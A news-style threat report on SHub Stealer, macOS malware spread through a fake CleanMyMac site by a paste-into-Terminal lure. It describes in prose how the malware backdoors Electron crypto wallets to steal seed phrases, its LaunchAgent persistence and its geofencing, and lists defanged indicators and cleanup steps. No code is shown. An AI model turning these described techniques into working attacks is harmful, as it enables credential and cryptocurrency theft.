A sophisticated phishing campaign is luring Mac users into downloading a potent malware known as SHub Stealer through a fake website masquerading as the popular system optimization tool CleanMyMac. The malicious site, operating at cleanmymacos[.]org, has no affiliation with the legitimate software developer MacPaw. Once installed, SHub Stealer is designed to pilfer a wide range of sensitive data, including saved passwords, browser history, Apple Keychain credentials, and crucially, cryptocurrency wallet files and Telegram session data.
Researchers at Malwarebytes have detailed the attack chain, which cleverly circumvents macOS security measures. The campaign leverages what is being termed the “ClickFix” method. This technique deceives users into opening their Terminal application and pasting a command that initially appears to be an installation instruction. However, this command secretly prints a fake MacPaw link for legitimacy, decodes a hidden base64 URL to obscure the true malicious destination, and then proceeds to download and execute a harmful shell script from an attacker-controlled server. Because the user directly executes the command, macOS defenses like Gatekeeper, XProtect, and notarization checks are largely ineffective.
SHub Stealer is identified as part of an escalating family of AppleScript-based macOS information-stealing malware, joining others like MacSync Stealer and Odyssey Stealer. Notably, SHub demonstrates enhanced capabilities beyond its relatives, incorporating per-victim tracking identifiers, geofencing logic, and a disturbing ability to permanently backdoor installed cryptocurrency wallet applications.
How SHub Stealer Backdoors Crypto Wallet Apps
The most alarming aspect of SHub Stealer is its post-exploitation functionality, specifically targeting cryptocurrency wallet applications. If the malware detects specific crypto wallet apps on a compromised system, it proceeds to silently replace the core logic file of each application with a malicious, backdoored version. This replaced file functions identically to the legitimate one, but in the background, it exfiltrates user credentials.
The five confirmed targets of this backdoor are Exodus, Atomic Wallet, Ledger Wallet, Ledger Live, and Trezor Suite. These applications are all built on the Electron framework, where the application’s core behavior resides in a file named `app.asar`. SHub actively terminates the running wallet application, downloads a modified `app.asar` file from its command-and-control server, overwrites the original file, strips the code signature, and then re-signs the application to ensure it is accepted by macOS.
For Exodus and Atomic Wallet, the backdoored application is configured to silently send the user’s password and seed phrase to `wallets-gate[.]io/api/injection` every time the wallet is unlocked. In the case of Ledger Wallet and Ledger Live, TLS validation is disabled upon startup, and a fake recovery wizard is presented to the user, which collects the seed phrase before transmitting it to the same endpoint. Trezor Suite, conversely, receives a full-screen overlay designed to mimic its legitimate interface. This overlay presents a fabricated security update that requests the seed phrase, validates it using the application’s own BIP39 library, and then sends it to the attacker.
All five backdoored applications exfiltrate data to the same `wallets-gate[.]io` endpoint, utilizing an identical API key and build ID, which strongly suggests a single operator is behind this campaign. To ensure persistent access, SHub installs a background task named `com.google.keystone.agent.plist` within `~/Library/LaunchAgents/`. This task imitates Google’s Keystone updater and is scheduled to execute remote commands every sixty seconds.
Before the main payload is launched, a loader script performs a check for a Russian-language keyboard layout. If detected, it signals the attacker’s server with a `cis_blocked` event and terminates without proceeding with data theft. This geofencing behavior is a common tactic among threat actors associated with Russian-speaking criminal networks, who often seek to avoid infecting systems in Commonwealth of Independent States countries to mitigate scrutiny from local law enforcement. Machines that pass this check have their IP address, macOS version, and hostname transmitted to the command-and-control server located at `res2erch-sl0ut[.]com`.
In light of these findings, users who may have executed the Terminal command from the `cleanmymacos[.]org` website are strongly advised to take immediate action. This includes closing the page if the command has not yet been run, and deleting the `com.google.keystone.agent.plist` file from `~/Library/LaunchAgents/` if present. Additionally, users should check and remove the `GoogleUpdate.app` folder from `~/Library/Application Support/Google/` if it exists. For those who had any of the five targeted wallet applications installed when the command was executed, their seed phrase should be considered compromised. It is imperative to move funds to a new, secure wallet on a clean device, as seed phrases cannot be altered. Furthermore, users should change their macOS login password and any credentials stored in their Keychain from a trusted device. Revoking and regenerating any API keys or SSH keys found in shell history files is also recommended to further secure their systems.
The ongoing development of sophisticated information-stealing malware, such as SHub Stealer, targeting macOS users underscores the persistent threat from cybercriminals. As these attackers evolve their methods to evade security measures, users must remain vigilant and practice cautious online behavior, especially when downloading software or executing commands from unverified sources. The future will likely see continued refinement of such attack vectors, necessitating ongoing security research and user education to combat these evolving threats.